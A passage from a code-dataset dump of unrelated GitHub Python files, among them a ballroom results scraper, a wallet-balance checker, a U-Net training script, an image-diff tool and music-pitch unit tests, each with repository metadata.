self.html.find_all('a'):\n evtName = link.string.strip()\n event = Event(link.get('href'), evtName, self.dancer)\n self.events[evtName] = event\n if event.level in dancer.eventsByLevel:\n dancer.eventsByLevel[event.level].append(event)\n else:\n dancer.eventsByLevel[event.level] = [event]\n\n def getResultsTablesForComp(self):\n for eventName in self.events:\n event = self.events[eventName]\n event.getResultsTablesForEvent()\n\n def getRecallPercentagesForComp(self):\n if self.recallPercentagesCalculated:\n return\n\n else:\n for eventName in self.events:\n event = self.events[eventName]\n self.getRecallPercentagesForEvent(event)\n self.calculateRecallPercentages()\n for judge in self.recallPercentages:\n percentage = self.recallPercentages[judge]\n self.recallPercentagesCalculated = True\n\n def getRecallPercentagesForEvent(self, event):\n for heat in event.resultsTables:\n self.getRecallPercentagesForHeat(event, heat)\n\n def getRecallPercentagesForHeat(self, event, heat):\n resultTable = event.resultsTables[heat]\n for judgeIndex in range(len(resultTable[0])):\n judgeNumber = resultTable[0][judgeIndex]\n if judgeNumber.isnumeric():\n if judgeNumber in self.numberOfPossibleRecalls:\n self.numberOfPossibleRecalls[judgeNumber] += 1\n else:\n self.numberOfPossibleRecalls[judgeNumber] = 1\n recall = resultTable[1][judgeIndex]\n if recall:\n if judgeNumber in self.numberOfRecalls:\n self.numberOfRecalls[judgeNumber] += 1\n else:\n self.numberOfRecalls[judgeNumber] = 1\n\n def calculateRecallPercentages(self):\n for judge in self.numberOfPossibleRecalls:\n numPossibleRecalls = self.numberOfPossibleRecalls[judge]\n if judge not in self.numberOfRecalls:\n self.recallPercentages[judge] = 0\n else:\n numRecalls = self.numberOfRecalls[judge]\n recallRate = numRecalls / numPossibleRecalls\n recallPercentage = Competition.convertRateToPercent(recallRate)\n self.recallPercentages[judge] = recallPercentage\n\n @staticmethod\n def convertRateToPercent(rate):\n return roundHalfUp(rate * 100)\n\n\nclass Event(object):\n stdDances = ['V. Waltz', 'Tango', 'Foxtrot', 'Quickstep', 'Waltz']\n smoothDances = ['V. 
Waltz', 'Tango', 'Foxtrot', 'Waltz']\n latinDances = {'Cha Cha', 'Rumba', 'Jive', 'Samba', 'Paso Doble'}\n rhythmDances = {'Cha Cha', 'Rumba', 'Swing', 'Mambo', 'Bolero'}\n levels = {'Newcomer', 'Bronze', 'Silver', 'Gold'}\n\n def __init__(self, url, eventName, dancer):\n self.dancer = dancer\n self.eventName = eventName\n self.url = url\n content = urllib.request.urlopen(self.url).read()\n self.eventHTML = BeautifulSoup(content, features='html.parser')\n\n self.style = ''\n self.place = 0\n self.dance = []\n self.rounds = 0\n self.level = ''\n self.YCNPoints = 0\n self.resultsTables = dict()\n\n self.getStyleAndDance()\n self.getRounds()\n self.getPlace()\n self.getLevel()\n self.getYCNPoints()\n\n def __repr__(self):\n eventStr = f'Event Name: {self.eventName}'\n eventStr += f'\\n\\tURL: {self.url}'\n eventStr += f'\\n\\tLevel: {self.level}'\n eventStr += f'\\n\\tStyle: {self.style}'\n eventStr += f'\\n\\tDance: {self.dance}'\n eventStr += f'\\n\\tRounds: {self.rounds}'\n eventStr += f'\\n\\tPlace: {self.place}'\n eventStr += f'\\n\\tPoints: {self.YCNPoints}'\n return self.eventName\n\n # gets the tier of each round i.e. quarterfinal, semifinal\n @staticmethod\n def getRoundName(i):\n roundNames = ['Final', 'Semi-Final', 'Quarter-Final']\n if i <= 2:\n return roundNames[i]\n else:\n deno = 2 ** i\n return \"1/\" + str(deno) + \"-Final\"\n\n # Gets the style and dance of the event\n def getStyleAndDance(self):\n if 'Am.' in self.eventName:\n for dance in Event.smoothDances:\n if dance in self.eventName:\n self.dance = [dance]\n self.style = 'Smooth'\n break\n\n for dance in Event.rhythmDances:\n if dance in self.eventName:\n self.dance = [dance]\n self.style = 'Rhythm'\n break\n\n elif 'Intl.' in self.eventName:\n for dance in Event.stdDances:\n if dance in self.eventName:\n self.dance = [dance]\n self.style = 'Standard'\n break\n\n for dance in Event.latinDances:\n if dance in self.eventName:\n self.dance = [dance]\n self.style = 'Latin'\n break\n\n elif 'Standard' in self.eventName:\n self.style = 'Standard'\n\n elif 'Smooth' in self.eventName:\n self.style = 'Smooth'\n\n elif 'Latin' in self.eventName:\n self.style = 'Latin'\n\n elif 'Rhythm' in self.eventName:\n self.style = 'Rhythm'\n\n if self.dance == []:\n self.getDanceFromEventPage()\n\n # goes to the event page to get the dance if the event name doesn't\n # include the dances\n def getDanceFromEventPage(self):\n dances = self.eventHTML.find_all('td', attrs={'class': 'h3'})[0:-1]\n for dance in dances:\n dance = str(dance)\n if self.style == 'Standard':\n for danceName in Event.stdDances:\n if danceName in dance:\n self.dance += [danceName]\n elif self.style == 'Smooth':\n for danceName in Event.smoothDances:\n if danceName in dance:\n self.dance += [danceName]\n elif self.style == 'Latin':\n for danceName in Event.latinDances:\n if danceName in dance:\n self.dance += [danceName]\n elif self.style == 'Rhythm':\n for danceName in Event.rhythmDances:\n if danceName in dance:\n self.dance += [danceName]\n\n # gets the syllabus level for the event\n def getLevel(self):\n for level in Event.levels:\n if level in self.eventName:\n self.level = level\n\n # gets the number of rounds\n def getRounds(self):\n self.rounds = len(self.eventHTML.find_all('option'))\n if self.rounds == 0:\n self.rounds = 1\n\n # gets the final placing of the competitor\n def getPlace(self):\n endIndex = self.eventName.find(')')\n self.place = int(self.eventName[0:endIndex])\n\n # Calculates YCN of each dance\n def getYCNPoints(self):\n if self.rounds == 2:\n if 
self.place <= 3:\n self.YCNPoints = 4 - self.place\n elif self.rounds > 2:\n if self.place <= 3:\n self.YCNPoints = 4 - self.place\n elif 3 < self.place <= 6:\n self.YCNPoints = 1\n else:\n self.YCNPoints = 0\n\n # gets the number of the couple\n def getCoupleNumber(self, eventPage):\n tableElements = eventPage.find_all('td')\n for element in tableElements:\n linksInTableElements = element.find_all('a')\n for link in linksInTableElements:\n if link.string == self.dancer.fullName:\n self.number = element.previous_sibling.string\n\n # gets all the result tables for the event\n def getResultsTablesForEvent(self):\n maxRound = self.rounds - 1\n for i in range(maxRound, 0, -1):\n roundName = Event.getRoundName(i)\n resultTable = self.getResultTableForRound(i, maxRound)\n if len(resultTable) == 2:\n self.resultsTables[roundName] = resultTable\n\n if resultTable[-1][-1] != 'R':\n break\n\n # navigates to the round page\n def getRoundPage(self, i):\n br = Browser()\n br.addheaders = [('User-agent', 'Firefox')]\n br.open(self.url)\n if i is not None:\n br.select_form(name=\"selectRound\")\n br['selCount'] = [str(i)]\n br.submit()\n else:\n i = 0\n soup = BeautifulSoup(br.response().read(), features='html.parser')\n return soup\n\n # gets result table for the round\n def getResultTableForRound(self, i, maxRound):\n roundPage = self.getRoundPage(i)\n if i == maxRound:\n self.getCoupleNumber(roundPage)\n\n # Consulted: https://stackoverflow.com/questions/23377533/ +\n # python-beautifulsoup-parsing-table\n data = []\n table = roundPage.find('table', attrs={'class': 't1n'})\n rows = table.find_all('tr')\n for rowIndex in range(1, len(rows)):\n columns = []\n row = rows[rowIndex]\n if rowIndex == 1:\n rowElements = row.find_all('td')\n for element in rowElements:\n columns += [element.text.strip()]\n data.append([element for element in columns])\n else:\n rowElements = row.find_all('td')\n competitorNumber = rowElements[0].text.strip()\n if competitorNumber != self.number:\n continue\n for elementIndex in range(len(rowElements)):\n element = rowElements[elementIndex].text.strip()\n columns += [element]\n if columns != []:\n data = Event.truncateExcessData(columns, data)\n return data\n\n @staticmethod\n # removes data for other competitors\n def truncateExcessData(columns, data):\n colsToBeAdded = []\n for i in range(len(data[0])):\n colsToBeAdded.append(columns[i])\n data.append(colsToBeAdded)\n return data\n\n\nclass Dancer(object):\n def __init__(self, firstName, lastName):\n self.firstName = firstName\n self.lastName = lastName\n self.fullName = self.firstName + ' ' + self.lastName\n self.resultsURL = (f'http://results.o2cm.com/individual.asp?' 
+\n f'szLast={lastName}&szFirst={firstName}')\n self.eventsByLevel = dict(Gold=[], Silver=[], Bronze=[], Newcomer=[])\n self.getCompetitions()\n self.newcomerYCN = dict()\n self.bronzeYCN = dict()\n self.silverYCNs = dict()\n self.goldYCNs = dict()\n self.ycnDict = dict()\n self.createYCNDict(self.newcomerYCN)\n self.createYCNDict(self.bronzeYCN)\n self.createYCNDict(self.silverYCNs)\n self.createYCNDict(self.goldYCNs)\n self.getYCNPoints()\n\n # gets the name of each competition the dancer competed at\n def getCompetitions(self):\n content = urllib.request.urlopen(self.resultsURL).read()\n self.resultsBS = BeautifulSoup(content, features='html.parser')\n results = self.resultsBS.find_all('table')[0]\n self.resultsPageHTML = self.resultsBS.prettify()\n\n self.competitions = []\n self.competitionList = []\n for competition in results.find_all('b'):\n self.competitions.append(competition.string)\n\n for i in range(len(self.competitions)):\n compName = self.competitions[i]\n if i < len(self.competitions) - 1:\n nextCompName = self.competitions[i + 1]\n endIndex = self.resultsPageHTML.find(nextCompName)\n else:\n endIndex = len(self.resultsPageHTML) - 1\n startIndex = self.resultsPageHTML.find(compName)\n compHTML = self.resultsPageHTML[startIndex:endIndex]\n self.competitionList.append(Competition(compHTML, compName, self))\n\n @staticmethod\n # creates the YCN dictionary according to template\n def createYCNDict(d):\n d['Latin'] = dict()\n d['Rhythm'] = dict()\n d['Standard'] = dict()\n d['Smooth'] = dict()\n\n for style in d:\n d[style]['Total'] = 0\n for dance in Event.latinDances:\n d['Latin'][dance] = 0\n for dance in Event.rhythmDances:\n d['Rhythm'][dance] = 0\n for dance in Event.stdDances:\n d['Standard'][dance] = 0\n for dance in Event.smoothDances:\n d['Smooth'][dance] = 0\n\n # gets YCN points for each level\n def getYCNPoints(self):\n self.getYCNForLevel('Gold', self.goldYCNs, None)\n self.getYCNForLevel('Silver', self.silverYCNs, self.goldYCNs)\n self.getYCNForLevel('Bronze', self.bronzeYCN, self.silverYCNs)\n self.getYCNForLevel('Newcomer', self.newcomerYCN, self.bronzeYCN)\n\n self.ycnDict['Newcomer'] = self.newcomerYCN\n self.ycnDict['Bronze'] = self.bronzeYCN\n self.ycnDict['Silver'] = self.silverYCNs\n self.ycnDict['Gold'] = self.goldYCNs\n\n # gets the YCN points for specified level\n def getYCNForLevel(self, level, currYCNDict, prevYCNDict):\n if prevYCNDict is not None:\n for style in prevYCNDict:\n for dance in prevYCNDict[style]:\n currYCNDict[style][dance] = prevYCNDict[style][dance] * 2\n\n for event in self.eventsByLevel[level]:\n for dance in event.dance:\n style = event.style\n if style not in currYCNDict:\n currYCNDict[style] = dict()\n currYCNDict[style]['Total'] = 0\n\n if dance in currYCNDict[style]:\n currYCNDict[style][dance] += event.YCNPoints\n else:\n currYCNDict[style][dance] = event.YCNPoints\n\n currYCNDict[style]['Total'] += event.YCNPoints\n","repo_name":"allincmu/TP112","sub_path":"TP2/ballroom_objects.py","file_name":"ballroom_objects.py","file_ext":"py","file_size_in_byte":15487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72621373283","text":"from xml.sax.saxutils import unescape\nfrom workflow import Workflow3\nfrom docopt import docopt\nimport os\nimport sys\nimport re\nimport plistlib\n\ndef wfFilter(filename):\n args=docopt(__doc__)\n plist = plistlib.readPlist(filename)\n name = plist['name']\n disabled = plist['disabled']\n\n if args.get('-r'):\n field='readme' #'>readme<'\n 
elif args.get('-a'):\n field='createdby' #'>createdby<'\n elif args.get('-b'):\n field='bundleid' #'>bundleid<'\n elif args.get('-c'):\n field='category' #'>category<'\n\n if disabled:\n return name,False\n elif (not args.get('<keyword>')\n and args.get('-w')):\n return name,True\n else:\n keyword=args.get('<keyword>')\n if keyword in plist[field]:\n return name,True\n else:\n return name,False\n\ndef workflow_subdirectories():\n args=docopt(__doc__)\n if not args.get('--pardir'):\n a_dir=os.path.dirname(os.path.dirname(os.path.abspath('info.plist')))\n else:\n a_dir = args.get('--pardir')\n my_workflows=[]\n for folder in os.listdir(a_dir):\n folderpath=os.path.join(a_dir,folder)\n plistfile = os.path.join(a_dir,folder,'info.plist')\n if os.path.isfile(plistfile):\n name,show=wfFilter(plistfile)\n if show:\n my_workflows.append((name,folderpath))\n return my_workflows\n\n\ndef main(wf):\n args=docopt(__doc__)\n query=args.get('<query>')\n quer=re.compile(query,re.IGNORECASE)\n my_workflows=workflow_subdirectories()\n my_workflows.sort(key=lambda tup: tup[0].lower())\n\n for i in my_workflows:\n if quer.search(i[0]):\n wf.add_item(i[0],\n 'Go to workflow directory in Terminal',\n arg=i[1],\n valid=True,\n icon=i[1]+'/icon.png')\n\n wf.send_feedback()\n\nif __name__==u\"__main__\":\n wf=Workflow3()\n sys.exit(wf.run(main))\n","repo_name":"dieggsy/alfred-workflow-browser","sub_path":"src/workflowsearch.py","file_name":"workflowsearch.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"1421316758","text":"# program wyznaczający największy wspólny dzielnik 3 zadanych liczb\r\n\r\ndef nwd(a,b):\r\n while (b>0):\r\n c = a % b\r\n a = b\r\n b = c\r\n return a\r\n\r\ndef main():\r\n l1=40\r\n l2=44\r\n l3=36\r\n print(nwd(nwd(l1,l2),l3))\r\n\r\nif __name__ == \"__main__\": main()","repo_name":"JakubWorek/introduction_to_computer_science_course","sub_path":"CW1/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12799341500","text":"import os\nimport sys\nimport random\nimport numpy as np\nfrom PIL import Image\nfrom unetModel import *\nfrom keras import backend as keras\nfrom keras.callbacks import ModelCheckpoint\n\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \nnp.random.seed(int(sys.argv[1]))\n\n\n\ndef read(id,prefix,dir):\n\n\tx = np.asarray(Image.open(dir + prefix + id),dtype=np.float32)\n\tx = (x-x.min())/(x.max()-x.min())\n\treturn np.reshape(x,[256,256,1])\n\n\ndef get_data(ids, img_dir, lbl_dir,bs):\n\ti = 0\n\timg = []\n\tmask = []\n\trandom.shuffle(ids)\n\tfor id in ids:\n\t\timg.append(read(id, 'image_original_' ,img_dir))\n\t\tmask.append(read(id, '_groundtruth_(1)_image_' ,lbl_dir))\n\t\ti = (i + 1)%bs\n\t\tif i == 0 :\n\t\t\tyield (np.array(img),np.array(mask))\n\t\t\timg = [] \n\t\t\tmask = []\n\t\t\ti = 0\n\n\ndef get_test_data(ids,img_dir):\n\timg = None\n\tfor id in ids:\n\t\timg = read(id,'image_original_',img_dir)\n\t\tyield np.reshape(img,[1,256,256,1])\n\t\timg = None\n\ndef train(net,n_epochs=50,batch_size=2,train_percent=0.9,save_ckpt=True) :\n\n\timg_dir = 'data/train_images/' \n\tlbl_dir = 'data/train_labels/' \n\n\timg_list = [f[15:] for f in os.listdir(img_dir)]\n\tids = img_list\n\tbs = 2\n\ttrain_ids = ids[:int(train_percent*len(ids))]\n\ttest_ids = ids[int(train_percent*len(ids)):]\n\n\tmodel_checkpoint = 
ModelCheckpoint('unet_modified_dice.hdf5', monitor='loss',verbose=1)\n\tnet.fit_generator(get_data(train_ids,img_dir,lbl_dir,bs),steps_per_epoch=50,epochs=1,callbacks=[model_checkpoint])\n\t\nif __name__ == '__main__' :\n\t# net = unet()\n\tnet = load_model('unet_modified_dice.hdf5')\n\ttrain(net)","repo_name":"Meet001/Image-Segmentation-using-Deep-Neural-Network","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33012275946","text":"import logging\nimport pandas as pd\nimport requests\nimport sys\nimport os\n\nsys.path.append(os.getcwd())\n\nlogging.basicConfig(format='%(asctime)s [Get Holiday Data] %(message)s')\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nfrom src.utils.config import config\n\ndataset = config['dataset']\n\nclass HolidayScrapper:\n\n url_template = \"https://excelnotes.com/holidays-indonesia-{}/\"\n\n def __init__(self, year, path) -> None:\n self.year = year\n self.url = self.url_template.format(self.year)\n self.path = path.format(year)\n\n def create_dataset(self) -> pd.DataFrame:\n logger.info(\"Start process\")\n try:\n content = self.get_web_content()\n data = self.get_holiday_data(content)\n formatted_data = self.reformat_data(data)\n dataset = self.save_dataset(formatted_data)\n logger.info(\"Finish process\")\n return dataset\n except Exception as e:\n logger.info(\"ERROR: {} - {}\".format(e.__class__.__name__, str(e)))\n return None\n\n def get_web_content(self) -> str:\n page = requests.get(self.url)\n logger.info(\"Finish get web content\")\n return page.content\n \n def get_holiday_data(self, content) -> list:\n parsed_content = BeautifulSoup(content, \"html.parser\")\n holiday_data = parsed_content.find(\"table\")\n result = [\n self.extract_row(row) for row in holiday_data.find_all(\"tr\") if \"Note\" not in row.text\n ]\n logger.info(\"Finish get holiday data\")\n return result\n \n def extract_row(self, data) -> list:\n all_columns = data.find_all(\"td\")\n result = [all_columns[i].text for i in range(2)]\n return result\n \n def reformat_data(self, data) -> list:\n result = [\n [row[0], self.change_date_format(row[1])] for row in data\n ]\n logger.info(\"Finish reformat data\")\n return result\n \n def change_date_format(self, data) -> datetime:\n old_format = '%b %d, %Y'\n new_format = '%Y-%m-%d %H:%M:%S.%f'\n converted_data = datetime.strptime(data, old_format)\n return datetime.strptime(\n datetime.strftime(converted_data, new_format), \n new_format\n )\n \n def save_dataset(self, data) -> pd.DataFrame:\n columns = [\n \"holiday\",\n \"date\"\n ]\n df = pd.DataFrame(data=data, columns=columns)\n df.to_parquet(self.path, \n index=False, compression=\"gzip\")\n logger.info(\"Finish save data\")\n return df\n","repo_name":"GibranBrahmanta/DSLS-MiniProject-DataScientist","sub_path":"src/data/holiday_data.py","file_name":"holiday_data.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24618243868","text":"\"\"\"\nsudo tcpdump -i lo -nn -XX\n\"\"\"\n\nimport argparse\nimport socket\nimport time\n\ndef main() -> None:\n parser = argparse.ArgumentParser()\n parser.add_argument('--host',\n\t\t\ttype=str,\n default='127.0.0.1',\n\t\t\thelp='Host.')\n parser.add_argument('--port',\n\t\t\ttype=int,\n 
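# NOTE: the client binds to a fixed local source port below, rather than an OS-chosen ephemeral one\n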
default=8001,\n\t\t\thelp='Port.')\n    parser.add_argument('--server_host',\n\t\t\ttype=str,\n                        default='127.0.0.1',\n\t\t\thelp='Server host.')\n    parser.add_argument('--server_port',\n\t\t\ttype=int,\n                        default=8000,\n\t\t\thelp='Server port.')\n    args = parser.parse_args()\n\n    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n        s.bind((args.host, args.port))\n        s.connect((args.server_host, args.server_port))\n\n        msg = b'PINGPING'\n        s.sendall(msg)\n        print(f'Sent {msg}.')\n\n        msg = s.recv(1024)\n        print(f'Received {msg}.')\n\nif __name__ == '__main__':\n    main()\n","repo_name":"mwhittaker/port_collision","sub_path":"echo_client.py","file_name":"echo_client.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"1456867675","text":"import requests \nimport json\nimport time\n\ndef get_balance(wallet, selected_chains):\n    url = f\"https://api.zerion.io/v1/wallets/{wallet}/portfolio/?currency=usd\"\n\n    headers = {\n        \"accept\": \"application/json\",\n        \"authorization\": \"\" # Check https://developers.zerion.io/\n    }\n\n    response = requests.get(url, headers=headers)\n    parsed_data = json.loads(response.text)\n    try:\n        balances = parsed_data['data']['attributes']['positions_distribution_by_chain']\n    except KeyError:\n        return 0\n    \n    total_balance = sum(balances.values())\n    \n    print(f\"Balance of wallet {wallet}:\")\n    for chain in selected_chains:\n        if chain in balances:\n            print(f' {chain}: {balances[chain]} USD')\n        else:\n            print(f\" {chain}: no data\")\n    print(f'Total wallet balance {total_balance} USD\\n')\n    return total_balance\n    \n    \n\ntotal_balance_of_all_wallets = 0\n\nif __name__ == '__main__':\n    selected_chains = input('Enter the chains (comma-separated) you want to check the balance in: ').split(',')\n    print()\n    with open('wallets.txt', 'r', encoding='utf-8') as file:\n        for wallet in file: \n            total_balance_of_all_wallets += get_balance(wallet.strip(), selected_chains)\n            time.sleep(1)\n\n    print(f'Total balance of all wallets: {total_balance_of_all_wallets}') ","repo_name":"MorS1337/wallet-checker","sub_path":"balance_checker.py","file_name":"balance_checker.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}
+{"seq_id":"23027084656","text":"from skimage.measure import compare_ssim\nimport argparse\nimport imutils\nimport cv2 as cv2\n\nclass ImageComparison(object):\n\n    def __init__(self):\n        pass\n\n    def compare_images(self, imageA, imageB, DifferenceImage):\n\n        # load the two input images using openCV\n        imageA = cv2.imread(imageA)\n        imageB = cv2.imread(imageB)\n\n        # convert the images to grayscale\n        grayA = cv2.cvtColor(imageA, cv2.COLOR_BGR2GRAY)\n        grayB = cv2.cvtColor(imageB, cv2.COLOR_BGR2GRAY)\n\n        (score, diff) = compare_ssim(grayA, grayB, full=True)\n        diff = (diff * 255).astype(\"uint8\")\n        # print(\"SSIM: {}\".format(score))\n\n        # threshold the difference image, followed by finding contours to\n        # obtain the regions of the two input images that differ\n        thresh = cv2.threshold(diff, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\n        cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n        cnts = imutils.grab_contours(cnts)\n\n        # loop over the contours\n        for c in cnts:\n            # compute the bounding box of the contour and then draw the\n            # bounding box on both input images to represent where the two\n            # images differ\n            
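# cv2.boundingRect returns the top-left corner (x, y) plus width and height of each changed region\n            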
(x, y, w, h) = cv2.boundingRect(c)\n cv2.rectangle(imageA, (x, y), (x + w, y + h), (0, 0, 255), 2)\n cv2.rectangle(imageB, (x, y), (x + w, y + h), (0, 0, 255), 2)\n\n # save the differance highlighted image `DifferenceImage`\n # cv2.imwrite(DifferenceImage, imageB)\n # show the output images\n cv2.imshow(\"Original\", imageA)\n cv2.imshow(\"Modified\", imageB)\n # cv2.imshow(\"Diff\", diff)\n # cv2.imshow(\"Thresh\", thresh)\n cv2.waitKey(0)\n\n \n# # Test the compare_images()\nimage = ImageComparison()\nimage.compare_images(\"D:\\\\Automation\\\\python\\\\pythonframework_v2\\\\project\\\\TestScreenshots\\\\LoginTestScenario\\\\loginWithProblemUser\\\\LoginPage\\\\navigateLoginPage.png\",\n\"D:\\\\Automation\\\\python\\\\pythonframework_v2\\\\project\\\\TestScreenshots\\\\LoginTestScenario\\\\loginWithProblemUser\\\\WelcomePage\\\\baseline_navigateWelcomePage.png\",\n\"D:\\\\Automation\\\\python\\\\pythonframework_v2\\\\project\\\\TestScreenshots\\\\differenceLogin.png\")","repo_name":"skbaithadiya/pythonframework_v2","sub_path":"framework/Utils/ImageCompare/ImageComparison.py","file_name":"ImageComparison.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"463703592","text":"import os\nimport time\n\nfrom datetime import datetime\nfrom multiprocessing import Process\n\n\ndef timer(start=None, to_var=False):\n if not start:\n print(datetime.now().ctime())\n return time.time()\n stop = time.time()\n m, s = divmod(stop - start, 60)\n h, m = divmod(m, 60)\n if to_var:\n return '{}:{}:{}'.format(int(h), int(m), round(s))\n print('total time {}:{}:{}'.format(int(h), int(m), round(s)))\n\n\ndef format_ratings_file(filename, delim, train=True):\n list_filename = filename.split(\"/\")\n path, old_filename = '/'.join(list_filename[:-1]), list_filename[-1]\n new_filename = \"train_\" if train else \"test_\"\n new_filename += old_filename.split(\".\")[0] + \".csv\"\n new_filename = path + \"/\" + new_filename\n os.system(\n (\"sed 's/{old_delim}/,/g' {filename} > {new_filename}\"\n ).format(\n old_delim=delim,\n filename=filename,\n new_filename=new_filename\n )\n )\n with open(new_filename, 'r') as original:\n data = original.read()\n with open(new_filename, 'w') as modified:\n modified.write(\"user,item,rating\\n\" + data)\n\n\nclass BaseMultiprocessing(object):\n def __init__(self, max_active_processes=10):\n \"\"\"Init.\"\"\"\n self.active_process_list = []\n self.max_active_processes = max_active_processes\n self.current_active_processes = 0\n\n def new_process(self, func, **kwargs):\n \"\"\"Spawn new process.\"\"\"\n p = Process(target=func, kwargs=kwargs)\n p.start()\n self.active_process_list.append(p)\n self.current_active_processes += 1\n\n def synchronize(self):\n \"\"\"Wait for all the alive process to terminate.\"\"\"\n for process in self.active_process_list:\n process.join()\n self.active_process_list = []\n self.current_active_processes = 0\n","repo_name":"tseste/nbcf","sub_path":"nbcf/_utilities.py","file_name":"_utilities.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8257844096","text":"import gettext\nimport unittest\nimport doctest\n\nimport solfege.mpd.musicalpitch\nfrom solfege.mpd.musicalpitch import MusicalPitch\nfrom solfege.mpd.interval import Interval\n\nclass TestMusicalPitch(unittest.TestCase):\n def test_normalize_double_accidental(self):\n for a, b in ((\"c\", 
\"c\"),\n (\"cisis\", \"d\"),\n (\"disis\", \"e\"),\n (\"eisis\", \"fis\"),\n (\"fisis\", \"g\"),\n (\"gisis\", \"a\"),\n (\"aisis\", \"b\"),\n (\"bisis\", \"cis'\"),\n (\"ceses\", \"bes,\"),\n (\"deses\", \"c\"),\n (\"eses\", \"d\"),\n (\"feses\", \"ees\"),\n (\"geses\", \"f\"),\n (\"ases\", \"g\"),\n (\"beses\", \"a\"),\n ):\n n = MusicalPitch.new_from_notename(a)\n n.normalize_double_accidental()\n self.assertEquals(n.get_octave_notename(), b)\n def test_add(self):\n n = MusicalPitch.new_from_notename('c')\n n = n + 2\n self.assertEquals(n.get_octave_notename(), 'd')\n def test_subtract(self):\n a = MusicalPitch.new_from_notename(\"g\")\n b = MusicalPitch.new_from_notename(\"f\")\n self.assertEquals(a - b, 2)\n def test_add_integer_fail(self):\n n = MusicalPitch.new_from_int(120)\n self.assertRaises(ValueError, lambda: n + 20)\n def test_add_interval_fail(self):\n n = MusicalPitch.new_from_int(120)\n i = Interval(\"M10\")\n self.assertRaises(ValueError, lambda: n + i)\n def test_internals(self):\n a = MusicalPitch()\n self.assertTrue(a.m_octave_i == a.m_accidental_i == 0)\n def test_trans(self):\n gettext.translation('solfege', './share/locale/', languages=['nb_NO']).install()\n n = MusicalPitch.new_from_notename(\"b,,\")\n self.assertEquals(n.get_octave_notename(), \"b,,\")\n self.assertEquals(n.get_user_octave_notename(), \"<sub>1</sub>H\")\n self.assertEquals(n.get_user_notename(), \"h\")\n def test_pitch_class(self):\n for n, i in ((\"c\", 0), (\"cis\", 1), (\"g\", 7), (\"ges\", 6), (\"gisis\", 9),\n (\"b\", 11), (\"bis\", 0), (\"bisis\", 1), (\"ces\", 11)):\n p = MusicalPitch.new_from_notename(n)\n self.assertEquals(p.pitch_class(), i)\n\nsuite = unittest.makeSuite(TestMusicalPitch)\nsuite.addTest(doctest.DocTestSuite(solfege.mpd.musicalpitch))\n","repo_name":"rannyeribaptist/Solfege","sub_path":"solfege/mpd/tests/test_musicalpitch.py","file_name":"test_musicalpitch.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"73866592802","text":"#\n# newToolbox_ESN_Multi\n#\n# Multi-frequency ESN updated toolbox\n#\n# Current version: January 2022\n# ================================================================\n\nfrom math import floor, ceil, inf\n#import datetime as dt\nimport pandas as pd\nimport numpy as np\n#from numpy import random\nimport re\nimport matplotlib.pyplot as plt\nfrom scipy.linalg import block_diag\nfrom scipy.stats import multivariate_normal\nfrom scipy.optimize import minimize as scipy_minimize\nfrom scipy.optimize import shgo, dual_annealing, basinhopping\nfrom scipy.special import kl_div\nfrom sklearn.model_selection import TimeSeriesSplit\nfrom sklearn.decomposition import PCA\nfrom pymoo.algorithms.soo.nonconvex.pattern import PatternSearch\nfrom pymoo.algorithms.soo.nonconvex.pso import PSO\nfrom pymoo.algorithms.moo.nsga2 import NSGA2\nfrom pymoo.algorithms.soo.nonconvex.nelder import NelderMead\nfrom pymoo.problems.functional import FunctionalProblem\nfrom pymoo.optimize import minimize as pymoo_minimize\nfrom pymoo.factory import get_termination\n#from pymoo.util.termination.x_tol import DesignSpaceToleranceTermination\n\nfrom newToolbox_ESN import ESN\nfrom newToolbox_ESN import matrh, vech\nfrom newToolbox_ESN import esn_data_to_nparray, ls_ridge, jack_ridge, r_ls\n\n# ----------------------------------------------------------------\n# Preamble\n\ndef closest_past_date(list_date, base_date, cutoff=0):\n \"\"\"\n list_date: collections of dates to 
compare.\n    base_date: reference date to compare to for closest match.\n    \"\"\"\n    #return min([i for i in list_date if i <= base_date], key=lambda x: abs(x - base_date)), 0\n    try:\n        d_min = min([i for i in list_date[cutoff:] if i <= base_date], key=lambda x: abs(x - base_date))\n    except ValueError:\n        print(f\"Error at: {base_date} with cutoff: {cutoff}\")\n        raise ValueError\n    return d_min, list_date.get_loc(d_min)\n    \n\ndef closest_future_date(list_date, base_date, cutoff=None):\n    #return min([i for i in list_date if i >= base_date], key=lambda x: abs(x - base_date)), 0\n    try:\n        d_min = min([i for i in list_date[:cutoff] if i >= base_date], key=lambda x: abs(x - base_date))\n    except ValueError:\n        print(f\"Error at: {base_date} with cutoff: {cutoff}\")\n        raise ValueError\n    return d_min, list_date.get_loc(d_min)\n\ndef infer_periods(freq, periods=10**4, scale=100):\n    \"\"\"\n    freq : str pandas frequency alias.\n    